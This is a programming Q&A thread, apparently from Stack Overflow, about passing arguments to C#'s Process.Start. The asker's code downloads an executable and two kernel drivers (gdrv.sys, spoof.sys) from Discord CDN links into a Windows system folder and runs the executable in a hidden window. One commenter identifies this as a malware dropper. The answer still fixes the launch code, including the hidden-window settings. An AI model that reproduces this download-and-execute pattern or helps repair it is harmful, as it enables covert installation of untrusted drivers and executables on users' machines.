# Why can't I put 3 variables in process start?

Tags: c#

This is my code

```
process = Process.Start(text, text2 + text3);
```

or

```
process = Process.Start(text, text2, text3);
```

I want to be able to open these text2 and text3 with the exe
however its not working please help ive tried for hours but i think im just dumb

```
    WebClient webClient = new WebClient();
    string text = "C:\\Windows\\IME\\frAQBc8W.exe";
    string text2 = "C:\\Windows\\IME\\gdrv.sys";
    string text3 = "C:\\Windows\\IME\\spoof.sys";
 
 

webClient.DownloadFile("https://cdn.discordapp.com/attachments/8365247606747777092/8366484520987655168/gdrv.sys", text2);
 webClient.DownloadFile("https://cdn.discordapp.com/attachments/8365247056747777092/8366484521621191390/spoof.sys", text3);
 webClient.DownloadFile("https://cdn.discordapp.com/attachments/8365124706747777092/83664844808205321153/frAQBc8tt.exe", text);


   Process process = new Process();

            process.StartInfo.FileName = "cmd.exe";

            process.StartInfo.UseShellExecute = true;

            process.StartInfo.CreateNoWindow = true;

            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;

            process = Process.Start(text, text2 + text3);
```

Comment: Suggested reading: **[Process.Start Method](https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-5.0)**

Comment: How would you open those two text files with the exe normally?

Comment: I use this hello.exe world.sys earth.sys

Comment: so then use hello.exe as the file name and pass the other two as arguments

Comment: Oh joy, another clear example of malware dropper...

Answer (score 0):

The first thing I noticed is that when you reassign `process` in the last line of code, it throws away all the previous lines where you were modifying the `StartInfo` properties. Since you've already gone to the trouble of setting them, you could just call `process.Start()` (without any assignment).

As for your question, if you want to start a process and pass it two arguments, then you could modify `StartInfo` as you were doing, except use `"hello.exe"` for the file name and set `"world.sys earth.sys"` as the value for `process.StartInfo.Arguments`:

```
Process process = new Process();
process.StartInfo.FileName = "hello.exe";
process.StartInfo.Arguments = "world.sys earth.sys";
process.StartInfo.UseShellExecute = true;
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start();
```

Or if you don't need to set all those additional `StartInfo` properties, you could just use the constructor that was built for taking a process name and its arguments: [`Start (string fileName, string arguments);`](https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-5.0#System_Diagnostics_Process_Start_System_String_System_String_).

Since you've stated that the typical command line is: `hello.exe world.sys earth.sys`, then we'd pass `hello.exe` as the first argument (and include the full path to the executable if it's not in the path environment variable already), followed by the string `"world.sys earth.sys"`.

In code it might look like:

```
var process = Process.Start(@"c:\temp\hello.exe", "world.sys earth.sys");
```

You could also combine these two options by setting the `StartInfo` properties (except for `FileName` and `Arguments`), and then call the `Start` method with the arguments above.